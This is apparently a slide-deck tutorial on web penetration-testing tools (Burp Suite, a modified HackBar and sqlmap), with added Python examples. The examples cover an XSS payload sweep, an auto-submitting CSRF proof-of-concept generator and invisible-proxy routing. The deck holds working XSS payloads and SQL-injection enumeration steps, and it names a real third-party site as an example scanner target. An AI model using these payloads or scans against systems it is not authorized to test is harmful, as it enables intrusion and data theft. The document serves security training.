Dirty0124 (@dirtycoder0124)
AGENDA
• Mastering Burp Suite
• HackBar (manual SQL injection)
• sqlmap (automated SQL injection)
• SoapUI (testing web services)
Burp Suite
• Intercepts browser traffic as a man-in-the-middle proxy
• You can intercept and edit every request your browser makes
• Vulnerability scanner
• Very useful for manual penetration testing
• Crawler (Spider)
• Fuzzer (Intruder)
• Installing Burp's CA certificate in Firefox, so that HTTPS traffic can be intercepted: in the dialog box that pops up, check "Trust this CA to identify web sites" and click "OK".
COMPARER
• When an Intruder attack has produced some very large responses with different lengths than the base response, you can compare these to quickly see where the differences lie.
• When testing for blind SQL injection using Boolean condition injection and similar tests, you can compare two responses to see whether injecting different conditions has produced a relevant difference in the responses.
EXTENDER
• Used to install Burp add-ons (extensions).
• Very useful for extending Burp's functionality.
• Extensions can be installed from the BApp Store.
• Open-source extensions downloaded from the net can also be loaded manually (Extender > Extensions > Add).
EXTENDER – Install open-source add-on
• You need Jython to load Python-based add-ons.
• Download the Jython standalone JAR and give Burp its path (Extender > Options > Python Environment).
• Some useful Burp Suite add-ons:
– Active Scan++
– CO2
– JSON Beautifier
– Reflected Parameters
– XssValidator
XssValidator (available in the BApp Store)
• Step 1: Intercept a request that carries a parameter, for example a "search" request, and send it to Intruder.
• Step 2: In Intruder, under "Payload Sets" select "Payload type: Extension-generated". Under "Payload Options" click "Select generator" (drop-down menu); in the window that opens choose "Extension payload generator: XSS Validator Payloads", so that "Selected generator" reads "XSS Validator Payloads", and click "OK".
• Step 3: Open the "XSSValidator" tab and copy its "Grep Phrase". Back in Intruder, on the "Options" tab under "Grep - Match", click "Clear" to remove the default grep strings, then paste the Grep Phrase copied from XssValidator.
• Step 4: Start the attack.
• Observe that the attack has started and that Intruder is firing the payloads, one after another, into the "search" parameter.
• To see a hit in the browser, select a positive response (one flagged by the grep match), right-click it and choose "Show response in browser".
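What the Intruder sweep with a Grep-Match phrase is actually doing, as an added example in Python (not XssValidator's or Burp's own code). The target is a constructed in-memory page with the reflected "search" parameter, once unencoded and once entity-encoded; the grep phrase and payload list are assumptions shaped like an extension-generated payload set. It also shows the limit of a plain grep: the marker string survives HTML encoding, so a substring hit alone is not proof of execution, which is why XssValidator confirms hits by rendering the response in a headless browser.

```python
"""Added example (not XssValidator's or Burp's code): an Intruder-style
payload sweep with a Grep-Match phrase against a constructed target."""
import html

# Assumption: the marker carried by the payloads. XssValidator's real grep
# phrase is whatever its tab shows; that is the one to paste into Intruder.
GREP_PHRASE = "grep-7f3a9c"

# Constructed payload set shaped like an extension-generated Intruder list.
PAYLOADS = [
    f"<script>alert('{GREP_PHRASE}')</script>",
    f"\"><img src=x onerror=alert('{GREP_PHRASE}')>",
    f"'><svg onload=alert('{GREP_PHRASE}')>",
    f"javascript:alert('{GREP_PHRASE}')",
]


def vulnerable_search(q: str) -> str:
    """Constructed target: reflects the 'search' parameter into HTML unencoded."""
    return f"<html><body><h1>Results for {q}</h1><p>0 hits</p></body></html>"


def hardened_search(q: str) -> str:
    """Same page with HTML entity encoding applied to the reflected value."""
    safe = html.escape(q, quote=True)
    return f"<html><body><h1>Results for {safe}</h1><p>0 hits</p></body></html>"


def intruder_sweep(handler, payloads, grep_phrase):
    """One row per payload, like the Intruder results table: response length,
    whether the Grep-Match phrase appears, and whether the payload came back
    byte-for-byte intact (tags and quotes unencoded)."""
    rows = []
    for p in payloads:
        body = handler(p)
        rows.append({"payload": p, "length": len(body),
                     "grep": grep_phrase in body, "intact": p in body})
    return rows


def positives(rows):
    """Payloads whose active markup survived unencoded: the responses worth
    opening with 'Show response in browser'. The 'grep' flag alone is not
    enough, because the marker also survives entity encoding."""
    return [r["payload"] for r in rows if r["intact"]]
```

Run `intruder_sweep(vulnerable_search, PAYLOADS, GREP_PHRASE)` and every payload is a positive; run it against `hardened_search` and none is, even though the grep flag is still set on every row. That second result is the false-positive class a bare Grep-Match produces and the extension's browser check removes.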
Cross-Site Request Forgery (CSRF): PoC with Burp Suite
CSRF
• Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated.
• Step 1: Visit http://testphp.vulnweb.com/login.php and log in.
– Username: test
– Password: test
• Step 2: Capture the request that is sent when you click the Update button.
• Step 3: Right-click the captured request and choose Engagement tools > Generate CSRF PoC. Change the phone number in the generated request and click "Test in browser"; if the update goes through from the generated page while you are logged in, the request is forgeable.
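The page Burp's generator produces, rebuilt as an added example in Python (not Burp's own "Generate CSRF PoC" code), together with the quick triage a tester does before bothering: is the session carried only by a cookie, is the content type one a plain form can send, and is there no token-looking parameter. The captured request is constructed and its field names are assumptions; take the real ones from the request Burp intercepted.

```python
"""Added example (not Burp's code): build the auto-submitting CSRF PoC page
from a captured request and triage whether the request is worth forging."""
import html
from urllib.parse import parse_qsl

# Constructed capture of the profile-update POST (field names assumed).
CAPTURED = {
    "method": "POST",
    "url": "http://testphp.vulnweb.com/userinfo.php",
    "headers": {"Cookie": "login=test%2Ftest",
                "Content-Type": "application/x-www-form-urlencoded"},
    "body": "urname=test&uphone=9999999999",
}

TOKEN_NAMES = ("csrf", "xsrf", "token", "nonce", "authenticity")


def csrf_poc(method: str, url: str, body: str) -> str:
    """Hidden-input form that re-sends the request from an attacker page.
    Names and values are entity-encoded so a quote in a value cannot break
    out of its attribute."""
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(n, quote=True)}" '
        f'value="{html.escape(v, quote=True)}" />'
        for n, v in parse_qsl(body, keep_blank_values=True))
    return (
        "<html>\n  <body>\n"
        f'  <form action="{html.escape(url, quote=True)}" method="{method}">\n'
        f"{inputs}\n"
        '    <input type="submit" value="Submit request" />\n'
        "  </form>\n"
        "  <script>document.forms[0].submit();</script>\n"
        "  </body>\n</html>\n"
    )


def csrf_blockers(headers: dict, body: str) -> list:
    """Reasons the captured request is probably NOT forgeable. An empty list
    means it is a candidate: ambient cookie auth, a content type a form can
    produce without a CORS preflight, no parameter that looks like a token."""
    h = {k.lower(): v for k, v in headers.items()}
    blockers = []
    if "cookie" not in h:
        blockers.append("no session cookie; authentication is not ambient")
    if "authorization" in h:
        blockers.append("Authorization header present; a form cannot add it")
    ctype = h.get("content-type", "").split(";")[0].strip()
    if ctype not in ("application/x-www-form-urlencoded",
                     "multipart/form-data", "text/plain", ""):
        blockers.append(f"content type {ctype} needs a custom request (preflight)")
    for name, _ in parse_qsl(body, keep_blank_values=True):
        if any(t in name.lower() for t in TOKEN_NAMES):
            blockers.append(f"parameter {name} looks like an anti-CSRF token")
    return blockers
```

An empty blocker list is only a reason to try the PoC, not proof: the server may still check the Origin/Referer header, and a session cookie marked SameSite=Lax or Strict is not sent on a cross-site POST at all, which is exactly what the "Test in browser" step settles.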
Pro Tips
• Add the website to scope.
• Make sure "Intercept is off".
• Visit the site and walk through every link and form by hand.
• Burp works best once it has seen the application this way: the site map fills up and the scanner and Intruder have real requests to work from.
Invisible Proxy in Burp Suite
• We all know Acunetix, Nikto and nmap.
• But do we know how they find vulnerabilities?
• What payloads do they use?
• Or simply, what do they do?
Invisible proxy is the solution: route the scanner's traffic through Burp and read what it sends.
SETUP
1. Add an entry to your system hosts file so the target name resolves to the Burp listener:
– 127.0.0.1 indeed.com
2. Enable "Support invisible proxying" on the Burp proxy listener (Proxy > Options > edit the listener > Request handling).
3. Run Acunetix (or any other scanner) against
– 127.0.0.1:8080
4. Capture the requests and learn from the scanner.
Caveat: with invisible proxying Burp forwards each request to whatever the Host header names. Aimed at 127.0.0.1:8080 that is Burp itself, and with the hosts entry "indeed.com" also resolves to Burp, so the request would loop. Either set "Redirect to host" / "Redirect to port" on the listener to the real target, or map the name to its real IP under Project options > Connections > Hostname Resolution.
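The one thing "Support invisible proxying" changes, shown as an added example in Python (not Burp's code). A proxy-aware browser puts the absolute URL on the request line; a scanner pointed straight at 127.0.0.1:8080, or at a name the hosts file maps there, sends an origin-form request line and the listener has to recover the destination from the Host header. `redirect_to` stands in for the listener's "Redirect to host" / "Redirect to port" settings; both sample requests are constructed, and the scanner's User-Agent is a placeholder.

```python
"""Added example (not Burp's code): how a listener decides where to forward
proxy-style vs. origin-form requests, and why the hosts-file trick needs a
redirect. Plain HTTP only; CONNECT/TLS handling is left out."""
from urllib.parse import urlsplit

# Constructed: what a proxy-aware browser sends to the listener.
PROXY_STYLE = (b"GET http://indeed.com/jobs?q=test HTTP/1.1\r\n"
               b"Host: indeed.com\r\n\r\n")
# Constructed: what a scanner sends once 'indeed.com' resolves to 127.0.0.1.
ORIGIN_FORM = (b"GET /jobs?q=test HTTP/1.1\r\n"
               b"Host: indeed.com\r\n"
               b"User-Agent: some-scanner\r\n\r\n")


def parse_head(raw: bytes):
    """Split the request line and headers (header names lower-cased)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, version, headers


def resolve_target(raw: bytes, invisible: bool = False, redirect_to=None):
    """Return (host, port, path) the listener should connect to and send.
    invisible=False models a normal listener, which rejects origin-form
    requests; redirect_to=(host, port) models 'Redirect to host/port'."""
    method, target, version, headers = parse_head(raw)
    if target.startswith(("http://", "https://")):
        # Proxy-style request line: destination is in the URL itself.
        u = urlsplit(target)
        host = u.hostname
        port = u.port or (443 if u.scheme == "https" else 80)
        path = (u.path or "/") + (f"?{u.query}" if u.query else "")
    else:
        if not invisible:
            raise ValueError("origin-form request; listener is not invisible")
        hostport = headers.get("host")
        if not hostport:
            raise ValueError("origin-form request without a Host header")
        host, _, p = hostport.partition(":")
        port = int(p) if p else 80
        path = target
    if redirect_to:
        # Without this (or Burp's Hostname Resolution override) the hosts-file
        # entry sends the forwarded connection straight back to the listener.
        host, port = redirect_to
    return host, port, path
```

With `invisible=True` the origin-form request resolves to indeed.com:80 from its Host header, which the hosts entry points back at Burp; passing `redirect_to=("203.0.113.10", 80)` (a documentation address standing in for the real target) is the equivalent of filling in "Redirect to host" on the listener.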
Entry in hosts file
• Path: C:\Windows\System32\drivers\etc\hosts
Setting in Burp Suite
Acunetix
Request Captured
HackBar
• HackBar is a Firefox add-on.
• It is used for manual SQL injection against web applications.
• The traditional HackBar is of little use for this; use a modified build.
Modified HackBar
• Several modified HackBar versions are available on the net.
• ~/@H3LL4R_H5H is a nice one.
• Download :
– https://addons.mozilla.org/en-US/firefox/addon/~h3ll4r_h5h-hackmod/
Normal HackBar vs. modified HackBar with DIOS (dump in one shot) payloads
MOZILLA FIREFOX ADDONS
SQLMAP
• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
• Support to download and upload any file from the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Cheat Sheet 1
Cheat Sheet 2
How to use?
• Crawl the target [my fav.]: let sqlmap spider the site itself (--crawl) instead of handing it a single URL.
• Find databases: once an injection is confirmed, enumerate the DBMS databases (--dbs).
Customization
• Sometimes sqlmap fails to detect a SQL injection.
• The solution is to make the detection phase more thorough: raise --level (more parameters and more payloads) and --risk (more intrusive payloads).
• By default sqlmap will test all GET and POST
parameters specified,